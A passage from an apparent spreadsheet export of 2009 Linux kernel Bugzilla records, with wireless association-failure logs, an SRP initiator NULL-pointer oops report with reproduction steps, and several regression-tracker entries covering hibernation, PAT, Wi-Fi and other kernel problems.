wlan0: authenticated Jul 25 12:50:03 gehenna kernel: [172503.865180] wlan0: associate with AP 00:0d:88:c9:04:7f Jul 25 12:50:03 gehenna kernel: [172503.865180] wlan0: associate with AP 00:0d:88:c9:04:7f Jul 25 12:50:03 gehenna kernel: [172503.867671] wlan0: RX ReassocResp from 00:0d:88:c9:04:7f (capab=0x431 status=12 aid=0) Jul 25 12:50:03 gehenna kernel: [172503.867671] wlan0: RX ReassocResp from 00:0d:88:c9:04:7f (capab=0x431 status=12 aid=0) Jul 25 12:50:03 gehenna kernel: [172503.867676] wlan0: AP denied association (code=12) Jul 25 12:50:03 gehenna kernel: [172504.064122] wlan0: associate with AP 00:0d:88:c9:04:7f Jul 25 12:50:03 gehenna kernel: [172504.066625] wlan0: RX AssocResp from 00:0d:88:c9:04:7f (capab=0x431 status=12 aid=0) Jul 25 12:50:03 gehenna kernel: [172504.066630] wlan0: AP denied association (code=12) Jul 25 12:50:03 gehenna kernel: [172504.266455] wlan0: associate with AP 00:0d:88:c9:04:7f Jul 25 12:50:03 gehenna kernel: [172504.268936] wlan0: RX AssocResp from 00:0d:88:c9:04:7f (capab=0x431 status=12 aid=0) Jul 25 12:50:03 gehenna kernel: [172504.268942] wlan0: AP denied association (code=12) Jul 25 12:50:03 gehenna kernel: [172504.464109] wlan0: association with AP 00:0d:88:c9:04:7f timed out Jul 25 12:50:05 cherub kernel: [ 793.392087] wlan0: authenticate with AP 00:0d:88:c9:04:7f Jul 25 12:50:05 cherub kernel: [ 793.393630] wlan0: authenticated Jul 25 12:50:05 cherub kernel: [ 793.393641] wlan0: associate with AP 00:0d:88:c9:04:7f Jul 25 12:50:05 cherub kernel: [ 793.395992] wlan0: RX AssocResp from 00:0d:88:c9:04:7f (capab=0x431 status=12 aid=0) Jul 25 12:50:05 cherub kernel: [ 793.396090] wlan0: AP denied association (code=12) Jul 25 12:50:05 cherub kernel: [ 793.593070] wlan0: associate with AP 00:0d:88:c9:04:7f Jul 25 12:50:05 cherub kernel: [ 793.595271] wlan0: RX AssocResp from 00:0d:88:c9:04:7f (capab=0x431 status=12 aid=0) Jul 25 12:50:05 cherub kernel: [ 793.595288] wlan0: AP denied association (code=12) Jul 25 12:50:06 cherub kernel: [ 793.792154] wlan0: associate with AP 00:0d:88:c9:04:7f Jul 25 12:50:06 cherub kernel: [ 793.794355] wlan0: RX AssocResp from 00:0d:88:c9:04:7f (capab=0x431 status=12 aid=0) Jul 25 12:50:06 cherub kernel: [ 793.794367] wlan0: AP denied association (code=12) Jul 25 12:50:06 cherub kernel: [ 793.992123] wlan0: association with AP 00:0d:88:c9:04:7f timed out Jul 25 12:50:11 cherub kernel: [ 799.735558] wlan0: authenticate with AP 00:0d:88:c9:04:7f Jul 25 12:50:11 cherub kernel: [ 799.737146] wlan0: authenticated Jul 25 12:50:11 cherub kernel: [ 799.737158] wlan0: associate with AP 00:0d:88:c9:04:7f Jul 25 12:50:11 cherub kernel: [ 799.739570] wlan0: RX AssocResp from 00:0d:88:c9:04:7f (capab=0x431 status=12 aid=0) Jul 25 12:50:11 cherub kernel: [ 799.739580] wlan0: AP denied association (code=12) Jul 25 12:50:12 cherub kernel: [ 799.937398] wlan0: associate with AP 00:0d:88:c9:04:7f Jul 25 12:50:12 cherub kernel: [ 799.939649] wlan0: RX AssocResp from 00:0d:88:c9:04:7f (capab=0x431 status=12 aid=0) Jul 25 12:50:12 cherub kernel: [ 799.939661] wlan0: AP denied association (code=12) Jul 25 12:50:12 cherub kernel: [ 800.136464] wlan0: associate with AP 00:0d:88:c9:04:7f Jul 25 12:50:12 cherub kernel: [ 800.138630] wlan0: RX AssocResp from 00:0d:88:c9:04:7f (capab=0x431 status=12 aid=0) Jul 25 12:50:12 cherub kernel: [ 800.138643] wlan0: AP denied association (code=12) Jul 25 12:50:12 cherub kernel: [ 800.336313] wlan0: association with AP 00:0d:88:c9:04:7f timed out Jul 25 12:50:13 gehenna kernel: [172514.839886] wlan0: authenticate with AP 00:0d:88:c9:04:7f Jul 25 12:50:13 gehenna kernel: [172514.845369] wlan0: authenticate with AP 00:0d:88:c9:04:7f Jul 25 12:50:13 gehenna kernel: [172514.845391] wlan0: authenticated Jul 25 12:50:13 gehenna kernel: [172514.845398] wlan0: associate with AP 00:0d:88:c9:04:7f Jul 25 12:50:13 gehenna kernel: [172514.849864] wlan0: deauthenticated Jul 25 12:50:14 cherub kernel: [ 802.358728] wlan0: authenticate with AP 00:0d:88:c9:04:7f Jul 25 12:50:14 cherub kernel: [ 802.360344] wlan0: authenticated Jul 25 12:50:14 cherub kernel: [ 802.360354] wlan0: associate with AP 00:0d:88:c9:04:7f Jul 25 12:50:14 cherub kernel: [ 802.362660] wlan0: RX AssocResp from 00:0d:88:c9:04:7f (capab=0x431 status=12 aid=0) Jul 25 12:50:14 cherub kernel: [ 802.362672] wlan0: AP denied association (code=12) Jul 25 12:50:14 cherub kernel: [ 802.561053] wlan0: associate with AP 00:0d:88:c9:04:7f Jul 25 12:50:14 cherub kernel: [ 802.563191] wlan0: RX AssocResp from 00:0d:88:c9:04:7f (capab=0x431 status=12 aid=0) Jul 25 12:50:14 cherub kernel: [ 802.563202] wlan0: AP denied association (code=12) Jul 25 12:50:14 cherub kernel: [ 802.749983] r8169: eth0: link down Jul 25 12:50:14 cherub kernel: [ 802.751248] ADDRCONF(NETDEV_UP): eth0: link is not ready Jul 25 12:50:14 gehenna kernel: [172515.848135] wlan0: direct probe to AP 00:0d:88:c9:04:7f try 1 Jul 25 12:50:14 gehenna kernel: [172515.850888] wlan0 direct probe responded Jul 25 12:50:14 gehenna kernel: [172515.850896] wlan0: authenticate with AP 00:0d:88:c9:04:7f Jul 25 12:50:14 gehenna kernel: [172515.853187] wlan0: authenticated Jul 25 12:50:14 gehenna kernel: [172515.853194] wlan0: associate with AP 00:0d:88:c9:04:7f Jul 25 12:50:14 gehenna kernel: [172515.855648] wlan0: RX AssocResp from 00:0d:88:c9:04:7f (capab=0x431 status=12 aid=0) Jul 25 12:50:14 gehenna kernel: [172515.855654] wlan0: AP denied association (code=12) Jul 25 12:50:14 gehenna kernel: [172516.052120] wlan0: associate with AP 00:0d:88:c9:04:7f Jul 25 12:50:14 gehenna kernel: [172516.054631] wlan0: RX AssocResp from 00:0d:88:c9:04:7f (capab=0x431 status=12 aid=0) Jul 25 12:50:14 gehenna kernel: [172516.054637] wlan0: AP denied association (code=12) Jul 25 12:50:14 gehenna kernel: [172516.255595] wlan0: association with AP 00:0d:88:c9:04:7f timed out Jul 25 12:50:15 cherub kernel: [ 802.761081] wlan0: associate with AP 00:0d:88:c9:04:7f Jul 25 12:50:15 cherub kernel: [ 802.763250] wlan0: RX AssocResp from 00:0d:88:c9:04:7f (capab=0x431 status=12 aid=0) Jul 25 12:50:15 cherub kernel: [ 802.763263] wlan0: AP denied association (code=12) Jul 25 12:50:15 cherub kernel: [ 802.777180] wlan0: deauthenticating by local choice (reason=3) Jul 25 12:50:15 cherub kernel: [ 802.977157] ADDRCONF(NETDEV_UP): wlan0: link is not ready Jul 25 12:50:15 cherub kernel: [ 803.125857] ADDRCONF(NETDEV_UP): wlan0: link is not ready Jul 25 12:50:15 gehenna kernel: [172516.871389] iwlagn: MAC is in deep sleep! Jul 25 12:50:15 gehenna kernel: [172517.393083] Registered led device: iwl-phy0:radio Jul 25 12:50:15 gehenna kernel: [172517.393128] Registered led device: iwl-phy0:assoc Jul 25 12:50:15 gehenna kernel: [172517.393171] Registered led device: iwl-phy0:RX Jul 25 12:50:15 gehenna kernel: [172517.393210] Registered led device: iwl-phy0:TX Jul 25 12:50:15 gehenna kernel: [172517.447710] ADDRCONF(NETDEV_UP): wlan0: link is not ready Jul 25 12:50:15 gehenna kernel: [172517.572860] iwlagn: MAC is in deep sleep! Jul 25 12:50:16 cherub kernel: [ 804.482073] wlan0: authenticate with AP 00:0d:88:c9:04:7f Jul 25 12:50:16 cherub kernel: [ 804.483676] wlan0: authenticated Jul 25 12:50:16 cherub kernel: [ 804.483687] wlan0: associate with AP 00:0d:88:c9:04:7f Jul 25 12:50:16 cherub kernel: [ 804.486022] wlan0: RX AssocResp from 00:0d:88:c9:04:7f (capab=0x431 status=12 aid=0) Jul 25 12:50:16 cherub kernel: [ 804.486034] wlan0: AP denied association (code=12) Jul 25 12:50:16 cherub kernel: [ 804.681062] wlan0: associate with AP 00:0d:88:c9:04:7f Jul 25 12:50:16 cherub kernel: [ 804.683234] wlan0: RX AssocResp from 00:0d:88:c9:04:7f (capab=0x431 status=12 aid=0) Jul 25 12:50:16 cherub kernel: [ 804.683250] wlan0: AP denied association (code=12) Jul 25 12:50:17 cherub kernel: [ 804.881052] wlan0: associate with AP 00:0d:88:c9:04:7f Jul 25 12:50:17 cherub kernel: [ 804.883228] wlan0: RX AssocResp from 00:0d:88:c9:04:7f (capab=0x431 status=12 aid=0) Jul 25 12:50:17 cherub kernel: [ 804.883240] wlan0: AP denied association (code=12) Jul 25 12:50:17 cherub kernel: [ 805.081077] wlan0: association with AP 00:0d:88:c9:04:7f timed out Jul 25 12:50:22 cherub kernel: [ 810.198669] wlan0: authenticate with AP 00:0d:88:c9:04:7f Jul 25 12:50:22 cherub kernel: [ 810.201878] wlan0: authenticated Jul 25 12:50:22 cherub kernel: [ 810.201890] wlan0: associate with AP 00:0d:88:c9:04:7f Jul 25 12:50:22 cherub kernel: [ 810.204118] wlan0: RX AssocResp from 00:0d:88:c9:04:7f (capab=0x431 status=12 aid=0) Jul 25 12:50:22 cherub kernel: [ 810.204132] wlan0: AP denied association (code=12) Jul 25 12:50:22 cherub kernel: [ 810.401069] wlan0: associate with AP 00:0d:88:c9:04:7f Jul 25 12:50:22 cherub kernel: [ 810.403237] wlan0: RX AssocResp from 00:0d:88:c9:04:7f (capab=0x431 status=12 aid=0) Jul 25 12:50:22 cherub kernel: [ 810.403247] wlan0: AP denied association (code=12) Jul 25 12:50:22 cherub kernel: [ 810.603699] wlan0: associate with AP 00:0d:88:c9:04:7f Jul 25 12:50:22 cherub kernel: [ 810.605875] wlan0: RX AssocResp from 00:0d:88:c9:04:7f (capab=0x431 status=12 aid=0) Jul 25 12:50:22 cherub kernel: [ 810.605885] wlan0: AP denied association (code=12) Jul 25 12:50:23 cherub kernel: [ 810.800086] wlan0: association with AP 00:0d:88:c9:04:7f timed out Jul 25 12:50:27 cherub kernel: [ 815.530784] wlan0: authenticate with AP 00:0d:88:c9:04:7f Jul 25 12:50:27 cherub kernel: [ 815.532320] wlan0: authenticated Jul 25 12:50:27 cherub kernel: [ 815.532330] wlan0: associate with AP 00:0d:88:c9:04:7f Jul 25 12:50:27 cherub kernel: [ 815.534644] wlan0: RX AssocResp from 00:0d:88:c9:04:7f (capab=0x431 status=12 aid=0) Jul 25 12:50:27 cherub kernel: [ 815.534656] wlan0: AP denied association (code=12) Jul 25 12:50:27 cherub kernel: [ 815.733107] wlan0: associate with AP 00:0d:88:c9:04:7f Jul 25 12:50:27 cherub kernel: [ 815.735329] wlan0: RX AssocResp from 00:0d:88:c9:04:7f (capab=0x431 status=12 aid=0) Jul 25 12:50:27 cherub kernel: [ 815.735353] wlan0: AP denied association (code=12) Jul 25 12:50:28 cherub kernel: [ 815.933190] wlan0: associate with AP 00:0d:88:c9:04:7f Jul 25 12:50:28 cherub kernel: [ 815.935757] wlan0: RX AssocResp from 00:0d:88:c9:04:7f (capab=0x431 status=12 aid=0) Jul 25 12:50:28 cherub kernel: [ 815.935769] wlan0: AP denied association (code=12) Jul 25 12:50:28 cherub kernel: [ 816.133077] wlan0: association with AP 00:0d:88:c9:04:7f timed out Jul 25 12:50:34 cherub kernel: [ 821.871385] wlan0: authenticate with AP 00:0d:88:c9:04:7f Jul 25 12:50:34 cherub kernel: [ 821.872889] wlan0: authenticated Jul 25 12:50:34 cherub kernel: [ 821.872899] wlan0: associate with AP 00:0d:88:c9:04:7f Jul 25 12:50:34 cherub kernel: [ 821.875211] wlan0: RX AssocResp from 00:0d:88:c9:04:7f (capab=0x431 status=12 aid=0) Jul 25 12:50:34 cherub kernel: [ 821.875223] wlan0: AP denied association (code=12) Jul 25 12:50:34 cherub kernel: [ 822.069237] wlan0: associate with AP 00:0d:88:c9:04:7f Jul 25 12:50:34 cherub kernel: [ 822.082858] wlan0: RX AssocResp from 00:0d:88:c9:04:7f (capab=0x431 status=12 aid=0) Jul 25 12:50:34 cherub kernel: [ 822.082882] wlan0: AP denied association (code=12) Jul 25 12:50:34 cherub kernel: [ 822.272563] wlan0: associate with AP 00:0d:88:c9:04:7f Jul 25 12:50:34 cherub kernel: [ 822.277168] wlan0: RX AssocResp from 00:0d:88:c9:04:7f (capab=0x431 status=12 aid=0) Jul 25 12:50:34 cherub kernel: [ 822.277191] wlan0: AP denied association (code=12) Jul 25 12:50:34 cherub kernel: [ 822.472596] wlan0: association with AP 00:0d:88:c9:04:7f timed out Jul 25 12:50:40 cherub kernel: [ 828.230154] wlan0: authenticate with AP 00:0d:88:c9:04:7f Jul 25 12:50:40 cherub kernel: [ 828.231663] wlan0: authenticated Jul 25 12:50:40 cherub kernel: [ 828.231674] wlan0: associate with AP 00:0d:88:c9:04:7f Jul 25 12:50:40 cherub kernel: [ 828.233971] wlan0: RX AssocResp from 00:0d:88:c9:04:7f (capab=0x431 status=12 aid=0) Jul 25 12:50:40 cherub kernel: [ 828.233984] wlan0: AP denied association (code=12) Jul 25 12:50:40 cherub kernel: [ 828.428102] wlan0: associate with AP 00:0d:88:c9:04:7f Jul 25 12:50:40 cherub kernel: [ 828.430260] wlan0: RX AssocResp from 00:0d:88:c9:04:7f (capab=0x431 status=12 aid=0) Jul 25 12:50:40 cherub kernel: [ 828.430269] wlan0: AP denied association (code=12) Jul 25 12:50:40 cherub kernel: [ 828.628129] wlan0: associate with AP 00:0d:88:c9:04:7f Jul 25 12:50:40 cherub kernel: [ 828.630323] wlan0: RX AssocResp from 00:0d:88:c9:04:7f (capab=0x431 status=12 aid=0) Jul 25 12:50:40 cherub kernel: [ 828.630336] wlan0: AP denied association (code=12) Jul 25 12:50:41 cherub kernel: [ 828.828161] wlan0: association with AP 00:0d:88:c9:04:7f timed out Jul 25 12:50:46 cherub kernel: [ 834.571290] wlan0: authenticate with AP 00:0d:88:c9:04:7f Jul 25 12:50:46 cherub kernel: [ 834.572777] wlan0: authenticated Jul 25 12:50:46 cherub kernel: [ 834.572787] wlan0: associate with AP 00:0d:88:c9:04:7f Jul 25 12:50:46 cherub kernel: [ 834.575439] wlan0: RX AssocResp from 00:0d:88:c9:04:7f (capab=0x431 status=12 aid=0) Jul 25 12:50:46 cherub kernel: [ 834.575451] wlan0: AP denied association (code=12) Jul 25 12:50:47 cherub kernel: [ 834.773098] wlan0: associate with AP 00:0d:88:c9:04:7f Jul 25 12:50:47 cherub kernel: [ 834.775290] wlan0: RX AssocResp from 00:0d:88:c9:04:7f (capab=0x431 status=12 aid=0) Jul 25 12:50:47 cherub kernel: [ 834.775302] wlan0: AP denied association (code=12) Jul 25 12:50:47 cherub kernel: [ 834.973105] wlan0: associate with AP 00:0d:88:c9:04:7f Jul 25 12:50:47 cherub kernel: [ 834.975332] wlan0: RX AssocResp from 00:0d:88:c9:04:7f (capab=0x431 status=12 aid=0) Jul 25 12:50:47 cherub kernel: [ 834.975344] wlan0: AP denied association (code=12) Jul 25 12:50:47 cherub kernel: [ 835.173847] wlan0: association with AP 00:0d:88:c9:04:7f timed out Jul 25 12:50:53 cherub kernel: [ 840.910630] wlan0: authenticate with AP 00:0d:88:c9:04:7f Jul 25 12:50:53 cherub kernel: [ 840.912167] wlan0: authenticated Jul 25 12:50:53 cherub kernel: [ 840.912177] wlan0: associate with AP 00:0d:88:c9:04:7f Jul 25 12:50:53 cherub kernel: [ 840.914560] wlan0: RX AssocResp from 00:0d:88:c9:04:7f (capab=0x431 status=12 aid=0) Jul 25 12:50:53 cherub kernel: [ 840.914571] wlan0: AP denied association (code=12) Jul 25 12:50:53 cherub kernel: [ 841.113138] wlan0: associate with AP 00:0d:88:c9:04:7f Jul 25 12:50:53 cherub kernel: [ 841.115324] wlan0: RX AssocResp from 00:0d:88:c9:04:7f (capab=0x431 status=12 aid=0) Jul 25 12:50:53 cherub kernel: [ 841.115337] wlan0: AP denied association (code=12) Jul 25 12:50:53 cherub kernel: [ 841.313067] wlan0: associate with AP 00:0d:88:c9:04:7f Jul 25 12:50:53 cherub kernel: [ 841.315260] wlan0: RX AssocResp from 00:0d:88:c9:04:7f (capab=0x431 status=12 aid=0) Jul 25 12:50:53 cherub kernel: [ 841.315273] wlan0: AP denied association (code=12) Jul 25 12:50:53 cherub kernel: [ 841.513094] wlan0: association with AP 00:0d:88:c9:04:7f timed out Jul 25 12:50:59 cherub kernel: [ 847.251447] wlan0: authenticate with AP 00:0d:88:c9:04:7f Jul 25 12:50:59 cherub kernel: [ 847.253151] wlan0: authenticated Jul 25 12:50:59 cherub kernel: [ 847.253163] wlan0: associate with AP 00:0d:88:c9:04:7f Jul 25 12:50:59 cherub kernel: [ 847.255313] wlan0: RX AssocResp from 00:0d:88:c9:04:7f (capab=0x431 status=12 aid=0) Jul 25 12:50:59 cherub kernel: [ 847.255326] wlan0: AP denied association (code=12) Jul 25 12:50:59 cherub kernel: [ 847.453085] wlan0: associate with AP 00:0d:88:c9:04:7f Jul 25 12:50:59 cherub kernel: [ 847.455274] wlan0: RX AssocResp from 00:0d:88:c9:04:7f (capab=0x431 status=12 aid=0) Jul 25 12:50:59 cherub kernel: [ 847.455287] wlan0: AP denied association (code=12) Jul 25 12:50:59 cherub kernel: [ 847.653122] wlan0: associate with AP 00:0d:88:c9:04:7f Jul 25 12:50:59 cherub kernel: [ 847.655346] wlan0: RX AssocResp from 00:0d:88:c9:04:7f (capab=0x431 status=12 aid=0) Jul 25 12:50:59 cherub kernel: [ 847.655367] wlan0: AP denied association (code=12) Jul 25 12:51:00 cherub kernel: [ 847.853077] wlan0: association with AP 00:0d:88:c9:04:7f timed out Jul 25 12:51:05 cherub kernel: [ 853.614448] wlan0: authenticate with AP 00:0d:88:c9:04:7f Jul 25 12:51:05 cherub kernel: [ 853.615982] wlan0: authenticated Jul 25 12:51:05 cherub kernel: [ 853.615991] wlan0: associate with AP 00:0d:88:c9:04:7f Jul 25 12:51:05 cherub kernel: [ 853.618490] wlan0: RX AssocResp from 00:0d:88:c9:04:7f (capab=0x431 status=0 aid=11) Jul 25 12:51:05 cherub kernel: [ 853.618502] wlan0: associated Jul 25 12:51:05 cherub kernel: [ 853.620221] ADDRCONF(NETDEV_CHANGE): wlan0: link becomes ready Jul 25 12:51:16 cherub kernel: [ 864.097036] wlan0: no IPv6 routers present Jul 25 12:52:38 cherub kernel: [ 945.861520] ath5k phy0: unsupported jumbo Jul 25 12:52:38 cherub kernel: [ 946.526479] ath5k phy0: unsupported jumbo Jul 25 12:52:52 cherub kernel: [ 959.945532] ath5k phy0: unsupported jumbo I can get more precise timestamps using socklog+svlogd instead of syslogd if it makes sense. I also tried to plug the rt73 usb stick into the aspire one, set it to monitor mode and capture the traffic when the ath5k is acting up. I collated the output of tcpdump -nlvvve with the kernel log; I don't know if this is useful at all, but I had attached the file to #10605 as http://bugzilla.kernel.org/attachment.cgi?id=22488. This bug is tracked by Ubuntu as https://bugs.launchpad.net/ubuntu/+source/linux/+bug/374265. Andras</t>
  </si>
  <si>
    <t>NULL pointer dereference by SRP initiator after restarting SRP target followed by SCSI reset of initiator</t>
  </si>
  <si>
    <t>2.6.30.3</t>
  </si>
  <si>
    <t>2009-08-02 17:57 UTC</t>
  </si>
  <si>
    <t>2011-01-22 11:05 UTC</t>
  </si>
  <si>
    <t>Setup of the target system: - SCST revision 1000. - Contents of /etc/scst.conf on the target: [HANDLER vdisk] DEVICE disk01,/dev/exported-block,NV_CACHE,512 [HANDLER vcdrom] [GROUP Default] [ASSIGNMENT Default] DEVICE disk01,0 [TARGETS enable] [TARGETS disable] - After having installed SCST, start it as follows: dd if=/dev/zero of=/dev/exported-block bs=1M count=1000 /etc/init.d/scst restart Setup of the initiator system: - Vanilla 2.6.30.3 kernel. - Once the target has been set up, import the SRP target as follows: rmmod ib_srp; modprobe ib_srp; ibsrpdm -c | while readtarget_info; do echo "${target_info}"; echo "${target_info}" &gt; /sys/class/infiniband_srp/srp-mlx4_0-1/add_target; done How to reproduce the NULL pointer dereference: - Run the following command on the target: /etc/init.d/scst restart - Run the following command on the initiator: sg_reset -d /dev/sdb Result: scsi host7: SRP reset_device called BUG: unable to handle kernel NULL pointer dereference at 0000000000000074 IP: [&lt;ffffffffa03f2db2&gt;] srp_send_tsk_mgmt+0xb4/0x130 [ib_srp] PGD 51e7067 PUD 48543067 PMD 0 Oops: 0000 [1] SMP last sysfs file: /sys/devices/system/cpu/cpu1/cache/index2/shared_cpu_map CPU 0 Modules linked in: ib_srp iptable_nat nf_nat nf_conntrack_ipv4 nf_conntrack iptable_filter ip_tables x_tables vboxnetflt(N) vboxdrv(N) snd_pcm_oss snd_mixer_oss binfmt_misc snd_seq snd_seq_device rdma_ucm scsi_transport_srp scsi_tgt ib_ipoib ib_uverbs ib_umad ib_iser rdma_cm ib_cm iw_cm mlx4_ib ib_sa ipv6 ib_mad ib_core ib_addr iscsi_tcp libiscsi scsi_transport_iscsi af_packet cpufreq_conservative cpufreq_userspace cpufreq_powersave acpi_cpufreq fuse loop dm_mod coretemp(N) snd_hda_intel snd_pcm snd_timer snd_page_alloc snd_hwdep ohci1394 i2c_i801 snd rtc_cmos mlx4_core sr_mod serio_raw pcspkr ieee1394 i2c_core intel_agp pata_marvell rtc_core skge soundcore button rtc_lib sky2 cdrom sg floppy uhci_hcd ehci_hcd sd_mod crc_t10dif usbcore edd ext3 mbcache jbd fan ide_pci_generic ide_core ata_generic ata_piix thermal processor thermal_sys hwmon pata_jmicron ahci libata scsi_mod dock [last unloaded: ib_srp] Supported: No Pid: 17736, comm: sg_reset Tainted: G 2.6.27.25-0.1-default #1 RIP: 0010:[&lt;ffffffffa03f2db2&gt;] [&lt;ffffffffa03f2db2&gt;] srp_send_tsk_mgmt+0xb4/0x130 [ib_srp] RSP: 0018:ffff88005e4ddbc8 EFLAGS: 00010046 RAX: 0000000000000000 RBX: ffff8800623d8620 RCX: 0000000000000000 RDX: ffff8800778d2000 RSI: ffff88006f088d80 RDI: ffff8800623d8620 RBP: ffff8800623d8b40 R08: ffffffff806e2c70 R09: 0000000100000000 R10: 0000000000000046 R11: 0000000000000000 R12: ffff88006f088d80 R13: 0000000000000008 R14: ffff8800623d8000 R15: ffff88007e7d3c00 FS: 00007f3cab09f6f0(0000) GS:ffffffff80a43080(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b CR2: 0000000000000074 CR3: 00000000069b6000 CR4: 00000000000006e0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 Process sg_reset (pid: 17736, threadinfo ffff88005e4dc000, task ffff8800095ca0c0) Stack: ffff8800623d82a8 0000000000000000 ffff8800623d8620 ffff8800623d8000 ffff8800381fd380 ffffffffa03f2ea5 ffff88005e4ddc38 ffff8800381fd380 ffff8800623d8000 0000000000000000 00007fff39b51144 ffffffffa0008351 Call Trace: [&lt;ffffffffa03f2ea5&gt;] srp_reset_device+0x77/0x101 [ib_srp] [&lt;ffffffffa0008351&gt;] scsi_reset_provider+0xc8/0x18d [scsi_mod] [&lt;ffffffffa00069d8&gt;] scsi_nonblockable_ioctl+0x90/0xb5 [scsi_mod] [&lt;ffffffffa012a869&gt;] sd_ioctl+0x61/0xc6 [sd_mod] [&lt;ffffffff8033ec81&gt;] blkdev_driver_ioctl+0x5d/0x72 [&lt;ffffffff8033f4ee&gt;] blkdev_ioctl+0x1f5/0x217 [&lt;ffffffff802d71aa&gt;] block_ioctl+0x1b/0x20 [&lt;ffffffff802bd275&gt;] vfs_ioctl+0x21/0x6c [&lt;ffffffff802bd4e2&gt;] do_vfs_ioctl+0x222/0x231 [&lt;ffffffff802bd542&gt;] sys_ioctl+0x51/0x73 [&lt;ffffffff8020bfbb&gt;] system_call_fastpath+0x16/0x1b [&lt;00007f3caac19b77&gt;] 0x7f3caac19b77 Code: 00 4d 85 e4 0f 84 85 00 00 00 49 8b 54 24 08 31 c0 b9 0c 00 00 00 4c 89 e6 48 89 d7 f3 ab c6 02 01 48 89 df 48 8b 45 10 48 8b 00 &lt;8b&gt; 40 74 48 c1 e0 30 48 0f c8 48 89 42 14 8b 45 50 44 88 6a 1e RIP [&lt;ffffffffa03f2db2&gt;] srp_send_tsk_mgmt+0xb4/0x130 [ib_srp] RSP &lt;ffff88005e4ddbc8&gt; CR2: 0000000000000074 ---[ end trace 4cec2e39421a0374 ]---</t>
  </si>
  <si>
    <t>intermittent hibernation problem</t>
  </si>
  <si>
    <t>2009-08-02 20:06 UTC</t>
  </si>
  <si>
    <t>2009-10-19 14:15 UTC</t>
  </si>
  <si>
    <t>Subject : [linux-pm] intermittent suspend problem Submitter : Ferenc Wagner &lt;wferi@niif.hu&gt; Date : 2009-07-30 13:29 References : https://lists.linux-foundation.org/pipermail/linux-pm/2009-July/022095.html This entry is being used for tracking a regression from 2.6.30. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.31-rc4 broke expect and gcc's testsuite</t>
  </si>
  <si>
    <t>2009-08-02 20:59 UTC</t>
  </si>
  <si>
    <t>2009-08-03 15:28 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.31-rc4 broke expect and gcc's testsuite Submitter : Mikael Pettersson &lt;mikpe@it.uu.se&gt; Date : 2009-07-29 11:00 References : http://marc.info/?l=linux-kernel&amp;m=124885806406520&amp;w=4 This entry is being used for tracking a regression from 2.6.30. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>PAT wc &amp; vmap mapping count issue</t>
  </si>
  <si>
    <t>2009-08-02 21:09 UTC</t>
  </si>
  <si>
    <t>2009-08-09 23:42 UTC</t>
  </si>
  <si>
    <t>Subject : PAT wc &amp; vmap mapping count issue ? Submitter : Jerome Glisse &lt;glisse@freedesktop.org&gt; Date : 2009-07-30 13:11 References : http://marc.info/?l=linux-kernel&amp;m=124895237114605&amp;w=4 Handled-By : "Pallipadi, Venkatesh" &lt;venkatesh.pallipadi@intel.com&gt; Patch : http://patchwork.kernel.org/patch/38436/ This entry is being used for tracking a regression from 2.6.29. Please don't close it until the problem is fixed in the mainline. Caused by: commit 3869c4aa18835c8c61b44bd0f3ace36e9d3b5bd0 Author: venkatesh.pallipadi@intel.com &lt;venkatesh.pallipadi@intel.com&gt; Date: Thu Apr 9 14:26:50 2009 -0700 x86, PAT: Changing memtype to WC ensuring no WB alias Signed-off-by: Venkatesh Pallipadi &lt;venkatesh.pallipadi@intel.com&gt; Signed-off-by: Suresh Siddha &lt;suresh.b.siddha@intel.com&gt; Signed-off-by: Ingo Molnar &lt;mingo@elte.hu&gt; First-Bad-Commit : 3869c4aa18835c8c61b44bd0f3ace36e9d3b5bd0</t>
  </si>
  <si>
    <t>Intel 3945ABG - problems on 2.6.30.X</t>
  </si>
  <si>
    <t>2.6.30.y</t>
  </si>
  <si>
    <t>2009-08-02 21:17 UTC</t>
  </si>
  <si>
    <t>2009-09-17 22:14 UTC</t>
  </si>
  <si>
    <t>Subject : Intel 3945ABG - problems on 2.6.30.X Submitter : dienet &lt;dienet@poczta.fm&gt; Date : 2009-07-31 15:17 References : http://marc.info/?l=linux-kernel&amp;m=124905346729959&amp;w=4 This entry is being used for tracking a regression from 2.6.29. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Oops from tar, 2.6.31-rc5, 32 bit on quad core phenom.</t>
  </si>
  <si>
    <t>2.6.31-rc5</t>
  </si>
  <si>
    <t>2009-08-02 21:20 UTC</t>
  </si>
  <si>
    <t>2009-08-20 14:57 UTC</t>
  </si>
  <si>
    <t>Subject : Oops from tar, 2.6.31-rc5, 32 bit on quad core phenom. Submitter : Gene Heskett &lt;gene.heskett@verizon.net&gt; Date : 2009-08-01 13:04 References : http://marc.info/?l=linux-kernel&amp;m=124913190304149&amp;w=4 This entry is being used for tracking a regression from 2.6.30. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Hibernation failure on dual core Athlon 64 (64-bit)</t>
  </si>
  <si>
    <t>2009-08-03 20:48 UTC</t>
  </si>
  <si>
    <t>2009-08-05 11:38 UTC</t>
  </si>
  <si>
    <t>Created attachment 22595 [details] dmesg output from the affected machine My test machine based on Athlon 64 X2 3800+ and a NVidia chipset suffers from hibernation regression where the second attempt to hibernate in a row hangs it right before the creation of the image. Since the issue is 100% reproducible, I was able to bisect it and that turned up the following commit: commit 3f4a782b5ce2698b1870b5a7b573cd721d4fce33 Author: Mathieu Desnoyers &lt;mathieu.desnoyers@polymtl.ca&gt; Date: Fri Jul 3 11:25:16 2009 -0400 [CPUFREQ] fix (utter) cpufreq_add_dev mess OK, I've tried to clean it up the best I could, but please test this with concurrent cpu hotplug and cpufreq add/remove in loops. I'm sure we will make other interesting findings. This is step one of fixing the overall locking dependency mess in cpufreq. Signed-off-by: Dave Jones &lt;davej@redhat.com&gt; First-Bad-Commit : 3f4a782b5ce2698b1870b5a7b573cd721d4fce33</t>
  </si>
  <si>
    <t>Huawei E169 GPRS connection causes Ooops</t>
  </si>
  <si>
    <t>2.6.31.rc5</t>
  </si>
  <si>
    <t>2009-08-04 09:02 UTC</t>
  </si>
  <si>
    <t>2009-10-30 18:23 UTC</t>
  </si>
  <si>
